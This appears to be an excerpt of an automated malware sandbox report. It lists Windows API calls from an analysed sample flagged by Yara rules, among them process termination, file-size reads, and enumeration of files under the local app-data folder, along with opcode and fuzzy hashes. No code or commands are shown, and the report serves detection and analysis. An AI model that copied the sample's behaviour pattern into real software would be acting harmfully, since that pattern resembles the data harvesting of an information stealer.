                            • Part of subcall function 00AF8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AF951E,00000000), ref: 00AF8D5B
                            • Part of subcall function 00AF8D50: RtlAllocateHeap.NTDLL(00000000), ref: 00AF8D62
                            • Part of subcall function 00AF8D50: wsprintfW.USER32 ref: 00AF8D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00AF95AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF95C9
                          • CloseHandle.KERNEL32(00000000), ref: 00AF95D6
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 72e4d99a9df5aaeb62719306000f2be6335209edc001fe08344771f50d9c731b
                          • Instruction ID: 221e8211395f2cd91ba8732f4882e948811f2e3894b1c81b25c7c3e85960a60e
                          • Opcode Fuzzy Hash: 72e4d99a9df5aaeb62719306000f2be6335209edc001fe08344771f50d9c731b
                          • Instruction Fuzzy Hash: 6D310CB1A0031C9FDB15DBE4CD49BEEB778EF54700F104459F60AAB284DB74AA89CB52
                          APIs
                          • CreateFileA.KERNEL32(00AF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00AF3AEE,?), ref: 00AF92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00AF3AEE), ref: 00AF9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00AF9327
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: 39838efb61c86f4c32c76b85cb0a8fed6255d1301eb058c8143a013317f0b5fd
                          • Instruction ID: 4483dcc22c8425e1e88f7b778252620524517eb41bcab426b409933b410b4174
                          • Opcode Fuzzy Hash: 39838efb61c86f4c32c76b85cb0a8fed6255d1301eb058c8143a013317f0b5fd
                          • Instruction Fuzzy Hash: 61F03C35E40308BBDB20DBF8DC49FAE77B9EB58710F108258BA51EB2C0D6709A018B54
                          APIs
                          • __getptd.LIBCMT ref: 00AFC74E
                            • Part of subcall function 00AFBF9F: __amsg_exit.LIBCMT ref: 00AFBFAF
                          • __getptd.LIBCMT ref: 00AFC765
                          • __amsg_exit.LIBCMT ref: 00AFC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00AFC797
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 0b878507fb40347d8a197c17a7ffe7d3d6f22b2bcef1efa63f17875ed5cc5306
                          • Instruction ID: fa560cd29bf800d0e808887e793ae29001669b3d92cffe8e91521e5027d4d1a5
                          • Opcode Fuzzy Hash: 0b878507fb40347d8a197c17a7ffe7d3d6f22b2bcef1efa63f17875ed5cc5306
                          • Instruction Fuzzy Hash: 45F0673290421C9BD720BBF99A06BBA33A06F10731F244149F605AA1E2DF645A409F66
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4F7A
                          • lstrcat.KERNEL32(?,00B01070), ref: 00AF4F97
                          • lstrcat.KERNEL32(?,017988D8), ref: 00AF4FAB
                          • lstrcat.KERNEL32(?,00B01074), ref: 00AF4FBD
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF492C
                            • Part of subcall function 00AF4910: FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                            • Part of subcall function 00AF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                            • Part of subcall function 00AF4910: FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 70041fb3092a5acb1cb1e588381e1ec07c04420de0be3434dae29dfcb5114b10
                          • Instruction ID: bfab96c597f560ee29f7e3aa048f8ff48282405816ac37e9af283322acac2e89
                          • Opcode Fuzzy Hash: 70041fb3092a5acb1cb1e588381e1ec07c04420de0be3434dae29dfcb5114b10
                          • Instruction Fuzzy Hash: 6621987690030867CB64FBB4DD86EEE777CEB64300F004594B659D3191EEB49AC98BB2